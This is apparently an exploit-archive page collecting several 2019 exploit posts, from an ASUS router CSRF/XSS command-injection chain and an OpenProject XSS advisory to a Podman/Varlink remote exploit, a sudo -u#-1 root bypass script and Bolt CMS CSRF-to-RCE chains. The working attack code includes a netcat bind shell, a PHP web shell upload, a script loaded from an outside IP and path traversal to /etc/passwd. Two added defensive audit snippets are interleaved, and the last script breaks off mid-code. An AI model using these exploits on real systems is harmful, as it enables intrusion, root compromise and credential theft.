
ASUS RT-N10+ 2.0.3.4 CSRF / XSS / Command Execution


ASUS RT-N10+ with firmware version 2.0.3.4 suffers from cross site request forgery and cross site scripting vulnerabilities that can assist with achieving command execution.


MD5 | 413b65790cd54119cea3da7c110a4c83

# Exploit Title: XSS And CSRF to RCE in ASUS RT-N10 Repeater Mode
# Date: 13/10/2019
# Exploit Author: Matheus Vrech
# Vendor Homepage: https://www.asus.com/
# Version: ASUS RT-N10+, Firmware: 2.0.3.4
# Tested on: Archlinux, Windows 10

# XSS:
# when someone changes the router to repeater mode you should be able to trigger JavaScript code:
# just create an AP with the payload and wait for the person to look for the available routers to repeat
vulnerable page: http://192.168.1.1/survey.htm
payload: <svg/onload="alert('xss')">

# CSRF + RCE
# it's possible to inject commands into the router by just getting an authenticated user to access the following url:
# change COMMAND to your command
vulnerable url: http://192.168.1.1/apply.cgi?current_page=Main_AdmStatus_Content.asp&next_page=Main_AdmStatus_Content.asp&next_host=&sid_list=FirewallConfig%3B&group_id=&modified=0&action_mode=+Refresh+&first_time=&action_script=&preferred_lang=EN&SystemCmd=COMMAND&action=Refresh

# With both of them it's possible to execute commands by abusing the repeater mode XSS

POC:
# create the page:

<html>
<head>
</head>
<body>
<iframe style="display: none" src="http://192.168.1.1/apply.cgi?current_page=Main_AdmStatus_Content.asp&next_page=Main_AdmStatus_Content.asp&next_host=&sid_list=FirewallConfig%3B&group_id=&modified=0&action_mode=+Refresh+&first_time=&action_script=&preferred_lang=EN&SystemCmd=touch /tmp/pwned&action=Refresh"></iframe>
</body>
</html>

# start your AP:
airbase-ng -e '<iframe src="//your.domain">' -c 8 -v wlp2s0mon


OpenProject 10.0.1 / 9.0.3 Cross Site Scripting


OpenProject versions 9.0.3 and below and 10.0.1 and below suffer from multiple cross site scripting vulnerabilities.


MD5 | 9337bb16250afaa04c0cf42e5bcc7729

SEC Consult Vulnerability Lab Security Advisory < 20191014-0 >
=======================================================================
title: Reflected XSS vulnerability
product: OpenProject
vulnerable version: <= 9.0.3, <=10.0.1
fixed version: 9.0.4, 10.0.2
CVE number: CVE-2019-17092
impact: medium
homepage: https://www.openproject.org
found: 2019-09-27
by: David Haintz (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"OpenProject is the leading open source project management software. Support your
project management process along the entire project life cycle: From project
initiation to closure."

Source: https://www.openproject.org/


Business recommendation:
------------------------
Update to the latest version of OpenProject.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected by further security issues.


Vulnerability overview/description:
-----------------------------------
1) Reflected XSS vulnerability (CVE-2019-17092)
The project list of OpenProject lacks input validation on data that is output inside
an error message. Due to the Content Security Policy inline scripts/styles weren't
allowed and the script source was limited to 'self'. To bypass this a JavaScript file
was added as attachment to an existing project. This could be used to extract the CSRF
token and create a new API key.


Proof of concept:
-----------------
1) Reflected XSS vulnerability (CVE-2019-17092)
Within this proof of concept, two steps are done. First the JavaScript code to be
executed is uploaded as an attachment to fulfill the Content Security Policy of
'self'. In the second step the uploaded JavaScript code is executed through the
reflected XSS vulnerability by using a script-tag.

a) Upload JavaScript code
An attacker can upload a JavaScript file as attachment into any project in the default
configuration. The attachment can be called directly, but will be downloaded
automatically. But since the browser doesn't care if a file shall be downloaded or
displayed when loading it from an src-property, an attacker can easily use it for the
reflected XSS vulnerability.
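A check for the attachment-as-script bypass described above, added here as an example and not part of the advisory: given the headers a server sends for an uploaded attachment, it reports whether a page protected by `script-src 'self'` could still load that file as a script and which header is missing. The origin and header values are constructed samples.

```python
"""Added example (not part of the SEC Consult advisory): decide whether a
served attachment can still be loaded as a script under `script-src 'self'`.

The bypass above works because 'self' admits any same-origin URL, and a
<script src> load ignores Content-Disposition: attachment. What browsers do
honour is X-Content-Type-Options: nosniff: with nosniff set, a script
response whose Content-Type is not a JavaScript MIME type is refused.
The header sets below are constructed samples; hostnames are placeholders."""
from urllib.parse import urlsplit

# MIME types a browser executes from <script src> even when nosniff is set
JS_MIME_TYPES = {
    "text/javascript", "application/javascript", "application/x-javascript",
    "text/ecmascript", "application/ecmascript",
}


def _header(headers, name):
    """Case-insensitive header lookup; returns '' when the header is absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def _origin(url):
    parts = urlsplit(url)
    return (parts.scheme.lower(), parts.netloc.lower())


def script_load_risk(app_url, attachment_url, headers):
    """Report whether <script src=attachment_url> would execute in a page at
    app_url whose CSP is script-src 'self', given the attachment's headers."""
    content_type = _header(headers, "Content-Type").split(";")[0].strip().lower()
    nosniff = _header(headers, "X-Content-Type-Options").strip().lower() == "nosniff"
    same_origin = _origin(app_url) == _origin(attachment_url)

    # 'self' only permits same-origin script URLs
    blocked_by_csp = not same_origin
    # nosniff makes the browser require a JavaScript MIME type for scripts
    blocked_by_nosniff = nosniff and content_type not in JS_MIME_TYPES

    findings = []
    if same_origin:
        findings.append("uploads are served from the application origin, so 'self' admits them")
    if not nosniff:
        findings.append("X-Content-Type-Options: nosniff is missing; "
                        "Content-Disposition alone does not stop <script src>")
    if content_type in JS_MIME_TYPES:
        findings.append("upload is served with a JavaScript MIME type; nosniff cannot block it")

    return {
        "same_origin": same_origin,
        "nosniff": nosniff,
        "content_type": content_type,
        "executable": not (blocked_by_csp or blocked_by_nosniff),
        "findings": findings,
    }


if __name__ == "__main__":
    # constructed sample: an OpenProject-style attachment route on the app origin
    app = "http://openproject.example/projects"
    att = "http://openproject.example/attachments/29/test.js"
    weak = {"Content-Type": "application/octet-stream",
            "Content-Disposition": "attachment; filename=\"test.js\""}
    hardened = dict(weak, **{"X-Content-Type-Options": "nosniff"})
    for name, hdrs in (("weak", weak), ("hardened", hardened)):
        print(name, script_load_risk(app, att, hdrs))
```

Serving uploads from a dedicated origin removes the 'self' path entirely; nosniff plus a non-script Content-Type closes the script load on the same origin.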

In this proof of concept the following JavaScript code was uploaded:

(async () => {
    var csrf_param = document.querySelector('meta[name=csrf-param]').content;
    var csrf_token = document.querySelector('meta[name=csrf-token]').content;

    var req = await fetch("http://$IP/my/generate_api_key", {
        "credentials": "include",
        "headers": {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
            "Content-Type": "application/x-www-form-urlencoded",
            "Upgrade-Insecure-Requests": "1"
        },
        "referrer": "http://$IP/my/access_token",
        "body": "_method=post&" + csrf_param + "=" + encodeURI(csrf_token),
        "method": "POST",
        "mode": "cors"
    });

    var resp = await req.text();

    var regex = /(Your access token is:\<br \/\>\<strong\>)(.*)(\<\/strong\>)/gm;
    var api_key = resp.match(regex)[0];
    api_key = api_key.slice(35, -9);
    alert("Generated new API key: " + api_key);
})();


This gets the CSRF token and the parameter name (since this seems to be configurable)
and sends a request to the generate_api_key functionality. After parsing, the key is
exposed in a message box, but can be used for further operations like adding an
administrative user.


b) Craft link
The reflected XSS vulnerability was found in the URL parameter 'sortBy' of the path
'/projects'. There an attacker may add any HTML code.

Such a link could be:
http://$IP/projects?sortBy=[[%22%3E%3Cscript%20src=%27/attachments/29/test.js%27%3E%3C%2Fscript%3E%22%2C%22%22]]


Vulnerable / tested versions:
-----------------------------
The following versions have been tested; they were the latest versions available at
the time of the test:

* 10.0.0
* 10.0.1

According to the vendor, all versions before v9.0.3 and v10.0.1 are affected.


Vendor contact timeline:
------------------------
2019-10-02: Contacting vendor through security@openproject.com
2019-10-02: Vendor verified the vulnerability and released the fix
2019-10-08: Verified fixed vulnerability
2019-10-08: Vendor announced that they will publish the CVE and full advisory
2019-10-14: Release of security advisory.


Solution:
---------
The vendor provides an updated version (v10.0.2 and v9.0.4) which should be
installed immediately. Release notes of the vendor:

https://www.openproject.org/release-notes/openproject-9-0-4/
https://www.openproject.org/release-notes/openproject-10-0-2/


Workaround:
-----------
There is no workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF D. Haintz / @2019


Podman / Varlink Remote Code Execution


Remote exploit for Podman when configured with Varlink that allows for remote command execution, denial of service, directory traversal, and information disclosure vulnerabilities.


MD5 | 877a6bf3a116aaaf342e4d3eba5c9537

#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# pickletime.py
#
# Podman + Varlink Insecure Config Remote Exploit
#
# Jeremy Brown [jbrown3264/gmail] @ Oct 2019
#
# -------
# Details
# -------
#
# Podman is a container engine / platform similar to Docker, supported
# by RedHat and Fedora, with Varlink being a protocol to exchange
# messages, which comes in handy for things like a Remote API.
#
# Now depending on how Podman and Varlink are deployed, they can be
# susceptible to local and remote attacks. There are a few API bugs
# in Podman itself, as well as a way to execute arbitrary commands if
# one can hit Podman via the Remote API. Running Podman with Varlink
# over tcp listening either on localhost or the network interface is the
# most vulnerable setup, but other ways such as access via the local UNIX
# socket or over SSH (key w/ no passphrase is common) aren't likely
# to be vulnerable unless ACLs or other stuff is broken.
#
# ------------------
# Testing the issues
# ------------------
#
# - check; just connects and issues GetInfo() to see if the host is
# running a podman service
#
# - exec; arbitrary cmd execution via ContainerRunlabel() specified
# by "run" label in the specified hosted image (self-setup)
#
# - dos; crash the server via choosing a /random/ selection from
# the available parsing bugs in APIs (we like to have fun here)
#
# - blind; dir traversal in SearchImages() API to force server to
# read an arbitrary file (no client-side output)
#
# - volrm; loops to remove all volumes via VolumeRemove() behavior
#
# ---------
# Exec demo
# ---------
#
# $ ./pickletime.py check podman-host:6000
# -> Podman service confirmed on host
#
# Then create a Dockerfile with an edgy label, build and host it.
#
# [Dockerfile]
# FROM busybox
# LABEL run=“nc -l -p 10000 -e /bin/bash”
#
# $ ./pickletime.py exec podman-host:6000 docker-registry:5000/image run
# Done!
#
# $ nc podman-host 10000
# ps
# PID TTY TIME CMD
# 111640 pts/1 00:00:00 bash
# 111786 pts/1 00:00:00 podman
# 111797 pts/1 00:00:00 nc
# 111799 pts/1 00:00:00 bash
# 111801 pts/1 00:00:00 ps
#
#
# Tested Podman 1.4.4/1.5.1 and Varlink 18 on Fedora Server 30 x64
#
# -----------
# Other stuff
# -----------
#
# Note: admins can really setup their connection and deployment configuration
# however they like, so it's hard to say how many folks are 'doing it wrong'
# or actually are running with proper auth and hardening in place. Shodan
# folks have been contacted about adding support to discover Varlink services
# to get more data that way as well.
#
# Fixed bugs:
# - DoS #2 was fixed in 1.5.1
# - Updated security docs / cli flags TBD
#
# > Why pickles? Why not.
#
# Dependencies to run this code:
#
# sudo dnf install -y python3-podman-api
#
#
#

import os
import sys
import socket
import subprocess
import random
import json
import podman
import pickle
import time

serviceName = 'io.podman' # service name

def main():
    if(len(sys.argv) < 3):
        print("Usage: %s <action> <host> [action....params]\n" % sys.argv[0])
        print("Eg: %s check tcp:podman-host:6000" % sys.argv[0])
        print("... %s exec tcp:podman-host:6000 docker-registry:5000/image run\n" % sys.argv[0])
        print("Actions: check, exec, dos, blind, volrm\n")
        return

    action = sys.argv[1]
    address = sys.argv[2] # eg. unix:/run/podman/io.podman for local testing

    ip = address.split(':')[1]
    port = int(address.split(':')[2])

    if(action == 'exec'):
        if(len(sys.argv) < 5):
            print("Error: need more args for exec")
            return

        image = sys.argv[3] # 'source' for pull
        label = sys.argv[4]

    isItTime()

    try:
        pman = podman.Client(uri=address)
    except Exception:
        print("Error: can't connect to host")
        return

    if(action == 'check'):
        result = json.dumps(pman.system.info())

        if('podman_version' in result):
            print("-> Podman service confirmed on host")
            return

        print("-!- Podman service was not found on host")


    elif(action == 'exec'):
        #
        # First pull the image from the repo, then run the label
        #
        try:
            result = pman.images.pull(image) # PullImage()
        except Exception as error:
            pass # call fails sometimes if image already exists which is *ok*

        #
        # ContainerRunlabel() ... but, no library imp. we'll do it live!
        #
        method = serviceName + '.' + 'ContainerRunlabel'

        message = '{\"method\":\"'
        message += method
        message += '\",\"parameters\":'
        message += '{\"Runlabel\":{\"image\":\"'
        message += image
        message += '\",\"label\":\"'
        message += label
        message += '\"}}}'
        message += '\0' # end each msg with a NULL byte

        doSocketSend(ip, port, message)


    elif(action == 'dos'):
        #bug = 1 # !fun
        bug = random.randint(1,2) # fun

        if(bug == 1):
            print("one")
            source = 'test'

            method = serviceName + '.' + 'LoadImage'

            message = '{\"method\":\"'
            message += method
            message += '\",\"parameters\":'
            message += '{\"source":\"'
            message += source
            message += '\"}}'
            message += '\0'

            doSocketSend(ip, port, message)


        # works on 1.4.4, fixed in 1.5.1
        if(bug == 2):
            print("two")

            reference = 'b' * 238
            source = '/dev/null' # this file must exist locally

            method = serviceName + '.' + 'ImportImage'

            message = '{\"method\":\"'
            message += method
            message += '\",\"parameters\":'
            message += '{\"reference\":\"'
            message += reference
            message += '\",\"source\":\"'
            message += source
            message += '\"}}'
            message += '\0'

            doSocketSend(ip, port, message)


    #
    # blind read of arbitrary files server-side
    # ...interesting but not particularly useful by itself
    #
    # openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 7
    # lseek(7, 0, SEEK_CUR) = 0
    # fstat(7, {st_mode=S_IFREG|0644, st_size=1672, ...}) = 0
    # read(7, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1672
    # close(7)
    #
    elif(action == 'blind'):
        method = serviceName + '.' + 'SearchImages'
        query = '../../../etc/passwd/' # magic '/' at the end

        message = '{\"method\":\"'
        message += method
        message += '\",\"parameters\":'
        message += '{\"query\":\"'
        message += query
        message += '\"}}'
        message += '\0'

        #pman.images.search(query) # unclear why this doesn't work
        doSocketSend(ip, port, message)

    #
    # Not really a bug, but an interesting feature to demo without auth
    # note: call CreateVolume() a few times beforehand to test the removal
    #
    elif(action == 'volrm'):
        method = serviceName + '.' + 'VolumeRemove'
        n = 10 # this is probably enough to test, but change as necessary

        message = '{\"method\":\"'
        message += method
        message += '\",\"parameters\":'
        message += '{\"options\":{\"volumes\":[\"\"]}}}' # empty = alphabetical removal
        message += '\0'

        for _ in range(n):
            doSocketSend(ip, port, message)
            time.sleep(0.5) # server processing time

    print("Done!")


#
# podman/varlink libraries don't support calling these API calls, so native we must
#
def doSocketSend(ip, port, message):
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, port))
        sock.send(message.encode())

    except Exception as error:
        print(str(error))
        return

    finally:
        if sock is not None:
            sock.close()


#
# obligatory routine
#
def isItTime():
    tm = time.localtime()

    p = pickle.dumps('it\'s pickle time!')

    if((str(tm.tm_hour) == '11') and (str(tm.tm_min) == '11')):
        print(pickle.loads(p))
    else:
        pass # no dill


if(__name__ == '__main__'):
    main()

ActiveFax Server 6.92 Build 0316 ActiveFaxServiceNT Unquoted Service Path


ActiveFax Server version 6.92 Build 0316 suffers from an ActiveFaxServiceNT unquoted service path vulnerability.


MD5 | e7dc061d5737dcb091825c7776b3f0b9

# Exploit Title : ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path
# Date : 2019-10-15
# Exploit Author : Cakes
# Vendor Homepage: https://www.actfax.com/
# Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe
# Version : ActiveFax Server 6.92 Build 0316
# Tested on Windows 10
# CVE : N/A

sc qc ActiveFaxServiceNT
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ActiveFaxServiceNT
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ActiveFax-Server-Dienst
DEPENDENCIES :
SERVICE_START_NAME : .\Administrator

sudo 1.8.28 Security Bypass


sudo version 1.8.28 suffers from a security bypass vulnerability.


MD5 | 6156d8a204112f3740a39ba32ccb9066

# Exploit Title : sudo 1.8.28 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam
# Version : Sudo <1.2.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : N/A

'''Check for the user sudo permissions

sudo -l

User hacker may run the following commands on kali:
(ALL, !root) /bin/bash


So user hacker can't run /bin/bash as root (!root)


User hacker sudo privilege in /etc/sudoers

# User privilege specification
root ALL=(ALL:ALL) ALL

hacker ALL=(ALL,!root) /bin/bash


With ALL specified, user hacker can run the binary /bin/bash as any user

EXPLOIT:

sudo -u#-1 /bin/bash

Example :

hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#

Description :
Sudo does not check whether the specified user id exists and runs the command with that arbitrary user id under the sudo privilege.
-u#-1 resolves to 0, which is root's id,

so /bin/bash is executed with root permission
Proof of Concept Code :

How to use :
python3 sudo_exploit.py

'''


#!/usr/bin/python3

import os

#Get current username

username = input("Enter current username :")


#check which binary the user can run with sudo

os.system("sudo -l > priv")


os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")

binary_file = open("binary")

binary= binary_file.read()

#execute sudo exploit

print("Lets hope it works")

os.system("sudo -u#-1 "+ binary)
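An audit for the sudoers pattern this exploit relies on, added here as an example and not part of the post: it parses sudoers entries, flags Runas specs that grant ALL while only excluding users such as root, and marks them exploitable when the sudo version is below 1.8.28. The sudoers text is a constructed sample modelled on the lines above.

```python
"""Added example, not part of the post above: audit sudoers Runas specs for
the pattern that CVE-2019-14287 (fixed in sudo 1.8.28) turns into a root shell.

A Runas list such as (ALL, !root) is meant to allow every target user except
root, but sudo < 1.8.28 resolves -u#-1 (and -u#4294967295) to uid 0 without
matching the "root" exclusion. The sudoers text below is a constructed
sample modelled on the lines shown in the post."""
import re

SUDO_FIXED_VERSION = (1, 8, 28)
_RUNAS_RE = re.compile(r"\(([^)]*)\)")
_SKIP_PREFIXES = ("#", "Defaults", "User_Alias", "Runas_Alias",
                  "Host_Alias", "Cmnd_Alias")


def parse_sudo_version(text):
    """'1.8.27p1' -> (1, 8, 27); the patch level is ignored."""
    return tuple(int(n) for n in re.findall(r"\d+", text)[:3])


def parse_sudoers_entry(line):
    """Parse 'user HOST=(runas_users[:runas_groups]) commands'.
    Returns None for blank lines, comments, Defaults and alias definitions."""
    line = line.strip()
    if not line or line.startswith(_SKIP_PREFIXES):
        return None
    parts = line.split(None, 1)
    if len(parts) < 2:
        return None
    user, rest = parts
    host, sep, spec = rest.partition("=")
    if not sep:
        return None
    spec = spec.strip()
    m = _RUNAS_RE.match(spec)
    if m:
        runas_users = m.group(1).split(":")[0]   # drop the optional group list
        commands = spec[m.end():].strip()
    else:
        runas_users = "root"                     # sudo's default Runas target
        commands = spec
    users = [u.strip() for u in runas_users.split(",") if u.strip()]
    return {
        "user": user,
        "host": host.strip(),
        "runas_allowed": [u for u in users if not u.startswith("!")],
        "runas_denied": [u.lstrip("!") for u in users if u.startswith("!")],
        "commands": commands,
    }


def runas_uid_resolves_to_root(uid_text):
    """True for the -u#<uid> values that sudo < 1.8.28 turned into uid 0:
    -1 and 4294967295 are both (uid_t)-1, which setresuid() treats as
    'leave unchanged', so the process keeps sudo's uid 0."""
    try:
        return int(uid_text) in (-1, 4294967295)
    except ValueError:
        return False


def audit_sudoers(sudoers_text, sudo_version):
    """Return entries whose Runas spec allows ALL while only excluding users.
    Each finding carries 'exploitable' = True when sudo predates the fix."""
    vulnerable_sudo = parse_sudo_version(sudo_version) < SUDO_FIXED_VERSION
    findings = []
    for line in sudoers_text.splitlines():
        entry = parse_sudoers_entry(line)
        if entry is None:
            continue
        if "ALL" in entry["runas_allowed"] and entry["runas_denied"]:
            entry["exploitable"] = vulnerable_sudo
            entry["reason"] = ("Runas ALL with exclusions %s: the excluded users are "
                               "reachable as uid 0 on sudo < 1.8.28"
                               % ", ".join(entry["runas_denied"]))
            findings.append(entry)
    return findings


# constructed sample, modelled on the /etc/sudoers lines shown in the post
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL

hacker  ALL=(ALL,!root) /bin/bash
alice   ALL=(www-data) /usr/bin/whoami
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS, "1.8.27"):
        print(finding["user"], finding["exploitable"], finding["reason"])
```

Until sudo is upgraded, the only reliable fix for a flagged entry is to list the permitted target users explicitly instead of ALL with exclusions.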

Bolt CMS 3.6.10 Cross Site Request Forgery


Bolt CMS version 3.6.10 suffers from a cross site request forgery vulnerability.


MD5 | d8a2a4d2c981229fca77e73214e29f08

# Exploit Title: Bolt CMS 3.6.10 - Cross-Site Request Forgery
# Date: 2019-10-15
# Exploit Author: r3m0t3nu11[Zero-Way]
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.5
# Tested on: Linux
# CVE : N/A

# last version

# Csrf p0c
<html>
<body>
<head>
Bolt v 3.x exploit 0day
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">

<script>
function submitRequest()
{
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/127.0.0.1\/index.php\/async\/folder\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "parent=&foldername=sss&namespace=files";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){

};
JSfuck1();
}

}
JSfuck1 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body1 = "filename=aaa&parentPath=sss&namespace=files";
xhr.send(body1);
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){

}


};
where();
}

where = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body2 =
"namespace=files&parent=sss&oldname=aaa&newname=aaa%3Cscript+src%3D'http%3A%26%23x2f%3B%26%23x2f%3B45.63.42.245%26%23x2f%3Bfinal.js'%3C%26%23x2f%3Bscript%3E.jpg";
xhr.send(body2);

}
Csrf();
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>

JS p0c

<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/index.php\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
token = doc.getElementsByName("file_upload[_token]")[0].value;
upload(token);
console.log(token);

}
};
xhr.send();
}



upload = async (csrfToken) =>{
var body =
"-----------------------------190530466613268610451083392867\r\n" +
"Content-Disposition: form-data; name=\"file_upload[select][]\"; filename=\"r3m0t3nu11.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"<?php system($_GET['test']);?>\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data; name=\"file_upload[upload]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------190530466613268610451083392867\r\n"
+
"Content-Disposition: form-data; name=\"file_upload[_token]\"\r\n" +
"\r\n" +
csrfToken + "\r\n" +
"-----------------------------190530466613268610451083392867--\r\n";

const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1\/index.php\/bolt\/files", true);
xhr.setRequestHeader("Accept",
"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------190530466613268610451083392867");
xhr.withCredentials = true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
Shell();
}

};

var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));

}


Shell = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/file/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=&oldname=r3m0t3nu11.txt&newname=dd%2Fphp-exif-systemasjpg%2Faa%2Fphp-exif-system.php%2Faaa.jpg";
xhr.send(body1);
bypass();
}

bypass = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/php-exif-system.php%2f&oldname=aaa.jpg&newname=bypass.php";
xhr.send(body1);
bypass2();
}

bypass2 = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1/index.php/async/folder/rename", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
xhr.timeout = 4000;
var body1 =
"namespace=files&parent=dd%2Fphp-exif-systemasjpg%2Faa/&oldname=php-exif-system.php&newname=bypass1";
xhr.send(body1);

}



Token();
</script>


version 6.5

CSrf p0c
<html>
<body>
<head>
Bolt v 3.x CVE-2019-17591 exploit
</head>
<h1>Bolt v 3.x csrf -> xss -> rce exploit</h1>
<img src ="
https://66.media.tumblr.com/8c1e5f1a62191b9091fd8736f8c4810b/tumblr_pf6q303FlE1vgbzx6o1_r1_400.jpg">

<script>
function submitRequest()
{
Csrf = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/create",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type",
"application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "filename=test&parentPath=&namespace=files";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
JSfuck();
}
};


}
JSfuck = async () => {
const xhr = new XMLHttpRequest();
xhr.open("POST",
"http:\/\/bolt-4mti18.bolt.dockerfly.com\/async\/file\/rename",
true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body1 = "namespace=files&parent=&oldname=test&newname=<img src='x' onerror=alert(1)>";
xhr.send(body1);

}
Csrf();
}
</script>
<form action="#">
<input type="button" value="Submit request"
onclick="submitRequest();" />
</form>
</body>
</html>

Js p0c


<script>
Token = async () => {
var xhr = new XMLHttpRequest();
xhr.open("GET", "\/bolt\/files", true);
xhr.responseType = "document";
xhr.withCredentials=true;
xhr.onreadystatechange = async (e) => {
if (xhr.readyState === 4 && xhr.status === 200){
doc = xhr.response;
